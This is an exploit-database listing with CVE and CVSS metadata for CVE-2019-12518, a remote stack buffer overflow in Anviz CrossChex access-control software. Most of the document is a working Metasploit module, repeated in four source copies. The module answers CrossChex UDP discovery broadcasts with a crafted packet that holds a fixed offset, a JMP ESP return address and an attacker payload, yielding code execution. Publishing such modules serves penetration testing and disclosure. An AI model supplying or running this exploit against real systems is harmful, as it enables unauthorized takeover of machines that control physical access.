ID 1337DAY-ID-33982
Type zdt
Reporter metasploit
Modified 2020-02-17T00:00:00
Description
Exploit for windows platform in category remote exploits
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
PACKET_LEN = 10
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Anviz CrossChex Buffer Overflow',
'Description' => %q{
Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
triggering a stack buffer overflow.
},
'Author' =>
[
'Luis Catarino <[email protected]>', # original discovery/exploit
'Pedro Rodrigues <[email protected]>', # original discovery/exploit
'agalway-r7', # Module creation
'adfoster-r7' # Module creation
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-12518'],
['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
['EDB', '47734']
],
'Payload' =>
{
'Space' => 8947,
'DisableNops' => true
},
'Arch' => ARCH_X86,
'EncoderType' => Msf::Encoder::Type::Raw,
'Privileged' => true,
'Platform' => 'win',
'DisclosureDate' => '2019-11-28',
'Targets' =>
[
[
'Crosschex Standard x86 <= V4.3.12',
{
'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
'Shift' => 4 # Positions payload to be written at beginning of ESP
}
]
],
'DefaultTarget' => 0
))
deregister_udp_options
register_options(
[
Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
])
end
def exploit
connect_udp
res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
if res.empty?
fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
end
print_status "CrossChex broadcast received, sending payload in response"
sploit = rand_text_english(target['Offset'])
sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
sploit << payload.encoded
udp_sock.sendto(sploit, host, port)
print_status "Payload sent"
end
end
# 0day.today [2020-02-21] #
{"id": "1337DAY-ID-33982", "bulletinFamily": "exploit", "title": "Anviz CrossChex - Buffer Overflow Exploit", "description": "Exploit for windows platform in category remote exploits", "published": "2020-02-17T00:00:00", "modified": "2020-02-17T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://0day.today/exploit/description/33982", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2019-12518"], "type": "zdt", "lastseen": "2020-02-21T05:09:15", "edition": 1, "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-12518"]}, {"type": "exploitdb", "idList": ["EDB-ID:48092"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156335"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/CROSSCHEX_DEVICE_BOF"]}], "modified": "2020-02-21T05:09:15", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2020-02-21T05:09:15", "rev": 2}, "vulnersScore": 7.3}, "sourceHref": "https://0day.today/exploit/33982", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n PACKET_LEN = 10\r\n\r\n include Msf::Exploit::Remote::Udp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Anviz CrossChex Buffer Overflow',\r\n 'Description'\t=> %q{\r\n Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,\r\n triggering a stack buffer overflow.\r\n },\r\n 'Author'\t \t=>\r\n [\r\n 'Luis Catarino <[email\u00a0protected]>', # original discovery/exploit\r\n 'Pedro Rodrigues <[email\u00a0protected]>', # original discovery/exploit\r\n 'agalway-r7', # Module creation\r\n 'adfoster-r7' # Module creation\r\n ],\r\n 'License'\t\t => MSF_LICENSE,\r\n 'References'\t=>\r\n [\r\n ['CVE', '2019-12518'],\r\n ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],\r\n ['EDB', '47734']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 8947,\r\n 'DisableNops' => true\r\n },\r\n 'Arch' => ARCH_X86,\r\n 'EncoderType' => Msf::Encoder::Type::Raw,\r\n 'Privileged'\t=> true,\r\n 'Platform' => 'win',\r\n 'DisclosureDate' => '2019-11-28',\r\n 'Targets' =>\r\n [\r\n [\r\n 'Crosschex Standard x86 <= V4.3.12',\r\n {\r\n 'Offset' => 261, # Overwrites memory to allow EIP to be overwritten\r\n 'Ret' => \"\\x07\\x18\\x42\\x00\", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data\r\n 'Shift' => 4 # Positions payload to be written at beginning of ESP\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n deregister_udp_options\r\n register_options(\r\n [\r\n Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),\r\n Opt::CHOST(\"0.0.0.0\", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \\'0.0.0.0\\' is needed to receive broadcasts.'),\r\n OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])\r\n ])\r\n end\r\n\r\n def exploit\r\n connect_udp\r\n\r\n res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore[\"TIMEOUT\"].to_i > 0 ? (datastore[\"TIMEOUT\"].to_i) : (nil))\r\n if res.empty?\r\n fail_with(Failure::TimeoutExpired, \"Module timed out waiting for CrossChex broadcast\")\r\n end\r\n\r\n print_status \"CrossChex broadcast received, sending payload in response\"\r\n sploit = rand_text_english(target['Offset'])\r\n sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data\r\n sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP\r\n sploit << payload.encoded\r\n\r\n udp_sock.sendto(sploit, host, port)\r\n print_status \"Payload sent\"\r\n end\r\nend\n\n# 0day.today [2020-02-21] #"}
{"cve": [{"lastseen": "2020-10-03T13:38:41", "description": "Anviz CrossChex access control management software 4.3.8.0 and 4.3.12 is vulnerable to a buffer overflow vulnerability.", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-02T17:15:00", "title": "CVE-2019-12518", "type": "cve", "cwe": ["CWE-120"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12518"], "modified": "2020-02-13T18:15:00", "cpe": ["cpe:/a:anviz:crosschex:4.3.8.0", "cpe:/a:anviz:crosschex:4.3.12"], "id": "CVE-2019-12518", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12518", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:anviz:crosschex:4.3.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:anviz:crosschex:4.3.12:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2020-02-13T23:01:19", "description": "", "published": "2020-02-13T00:00:00", "type": "packetstorm", "title": "Anviz CrossChex Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12518"], "modified": "2020-02-13T00:00:00", "id": "PACKETSTORM:156335", "href": "https://packetstormsecurity.com/files/156335/Anviz-CrossChex-Buffer-Overflow.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = NormalRanking \nPACKET_LEN = 10 \n \ninclude Msf::Exploit::Remote::Udp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Anviz CrossChex Buffer Overflow', \n'Description' => %q{ \nWaits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast, \ntriggering a stack buffer overflow. \n}, \n'Author' => \n[ \n'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit \n'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit \n'agalway-r7', # Module creation \n'adfoster-r7' # Module creation \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2019-12518'], \n['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'], \n['EDB', '47734'] \n], \n'Payload' => \n{ \n'Space' => 8947, \n'DisableNops' => true \n}, \n'Arch' => ARCH_X86, \n'EncoderType' => Msf::Encoder::Type::Raw, \n'Privileged' => true, \n'Platform' => 'win', \n'DisclosureDate' => '2019-11-28', \n'Targets' => \n[ \n[ \n'Crosschex Standard x86 <= V4.3.12', \n{ \n'Offset' => 261, # Overwrites memory to allow EIP to be overwritten \n'Ret' => \"\\x07\\x18\\x42\\x00\", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data \n'Shift' => 4 # Positions payload to be written at beginning of ESP \n} \n] \n], \n'DefaultTarget' => 0 \n)) \nderegister_udp_options \nregister_options( \n[ \nOpt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'), \nOpt::CHOST(\"0.0.0.0\", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \\'0.0.0.0\\' is needed to receive broadcasts.'), \nOptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100]) \n]) \nend \n \ndef exploit \nconnect_udp \n \nres, host, port = udp_sock.recvfrom(PACKET_LEN, datastore[\"TIMEOUT\"].to_i > 0 ? (datastore[\"TIMEOUT\"].to_i) : (nil)) \nif res.empty? \nfail_with(Failure::TimeoutExpired, \"Module timed out waiting for CrossChex broadcast\") \nend \n \nprint_status \"CrossChex broadcast received, sending payload in response\" \nsploit = rand_text_english(target['Offset']) \nsploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data \nsploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP \nsploit << payload.encoded \n \nudp_sock.sendto(sploit, host, port) \nprint_status \"Payload sent\" \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156335/crosschex_device_bof.rb.txt"}], "metasploit": [{"lastseen": "2020-10-13T07:16:38", "description": "Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast, triggering a stack buffer overflow.\n", "published": "2020-02-03T17:02:04", "type": "metasploit", "title": "Anviz CrossChex Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12518"], "modified": "2020-03-06T10:41:45", "id": "MSF:EXPLOIT/WINDOWS/MISC/CROSSCHEX_DEVICE_BOF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n PACKET_LEN = 10\n\n include Msf::Exploit::Remote::Udp\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Anviz CrossChex Buffer Overflow',\n 'Description' => %q{\n Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,\n triggering a stack buffer overflow.\n },\n 'Author' =>\n [\n 'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit\n 'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit\n 'agalway-r7', # Module creation\n 'adfoster-r7' # Module creation\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2019-12518'],\n ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],\n ['EDB', '47734']\n ],\n 'Payload' =>\n {\n 'Space' => 8947,\n 'DisableNops' => true\n },\n 'Arch' => ARCH_X86,\n 'EncoderType' => Msf::Encoder::Type::Raw,\n 'Privileged' => true,\n 'Platform' => 'win',\n 'DisclosureDate' => '2019-11-28',\n 'Targets' =>\n [\n [\n 'Crosschex Standard x86 <= V4.3.12',\n {\n 'Offset' => 261, # Overwrites stack memory to allow saved EIP to be overwritten\n 'Ret' => \"\\x07\\x18\\x42\\x00\", # Overwrites saved EIP with address of 'JMP ESP' assembly instruction found in CrossChex code\n 'Shift' => 4 # Positions payload to be written at beginning of ESP\n }\n ]\n ],\n 'DefaultTarget' => 0\n )\n )\n deregister_udp_options\n register_options(\n [\n Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),\n Opt::CHOST('0.0.0.0', true, 'IP address that UDP Socket listens for CrossChex broadcast on. \\'0.0.0.0\\' is needed to receive broadcasts.'),\n OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])\n ]\n )\n end\n\n def exploit\n connect_udp\n\n res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore['TIMEOUT'].to_i > 0 ? datastore['TIMEOUT'].to_i : nil)\n if res.empty?\n fail_with(Failure::TimeoutExpired, 'Module timed out waiting for CrossChex broadcast')\n end\n\n print_status 'CrossChex broadcast received, sending payload in response'\n sploit = rand_text_english(target['Offset'])\n sploit << target.ret # Overwrites saved EIP with address of 'JMP ESP' assembly instruction found in CrossChex code\n sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP\n sploit << payload.encoded\n\n udp_sock.sendto(sploit, host, port)\n print_status 'Payload sent'\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/crosschex_device_bof.rb"}], "exploitdb": [{"lastseen": "2020-02-17T17:33:37", "description": "", "published": "2020-02-17T00:00:00", "type": "exploitdb", "title": "Anviz CrossChex - Buffer Overflow (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-12518"], "modified": "2020-02-17T00:00:00", "id": "EDB-ID:48092", "href": "https://www.exploit-db.com/exploits/48092", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n PACKET_LEN = 10\r\n\r\n include Msf::Exploit::Remote::Udp\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Anviz CrossChex Buffer Overflow',\r\n 'Description'\t=> %q{\r\n Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,\r\n triggering a stack buffer overflow.\r\n },\r\n 'Author'\t \t=>\r\n [\r\n 'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit\r\n 'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit\r\n 'agalway-r7', # Module creation\r\n 'adfoster-r7' # Module creation\r\n ],\r\n 'License'\t\t => MSF_LICENSE,\r\n 'References'\t=>\r\n [\r\n ['CVE', '2019-12518'],\r\n ['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],\r\n ['EDB', '47734']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 8947,\r\n 'DisableNops' => true\r\n },\r\n 'Arch' => ARCH_X86,\r\n 'EncoderType' => Msf::Encoder::Type::Raw,\r\n 'Privileged'\t=> true,\r\n 'Platform' => 'win',\r\n 'DisclosureDate' => '2019-11-28',\r\n 'Targets' =>\r\n [\r\n [\r\n 'Crosschex Standard x86 <= V4.3.12',\r\n {\r\n 'Offset' => 261, # Overwrites memory to allow EIP to be overwritten\r\n 'Ret' => \"\\x07\\x18\\x42\\x00\", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data\r\n 'Shift' => 4 # Positions payload to be written at beginning of ESP\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n deregister_udp_options\r\n register_options(\r\n [\r\n Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),\r\n Opt::CHOST(\"0.0.0.0\", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \\'0.0.0.0\\' is needed to receive broadcasts.'),\r\n OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])\r\n ])\r\n end\r\n\r\n def exploit\r\n connect_udp\r\n\r\n res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore[\"TIMEOUT\"].to_i > 0 ? (datastore[\"TIMEOUT\"].to_i) : (nil))\r\n if res.empty?\r\n fail_with(Failure::TimeoutExpired, \"Module timed out waiting for CrossChex broadcast\")\r\n end\r\n\r\n print_status \"CrossChex broadcast received, sending payload in response\"\r\n sploit = rand_text_english(target['Offset'])\r\n sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data\r\n sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP\r\n sploit << payload.encoded\r\n\r\n udp_sock.sendto(sploit, host, port)\r\n print_status \"Payload sent\"\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/48092"}]}
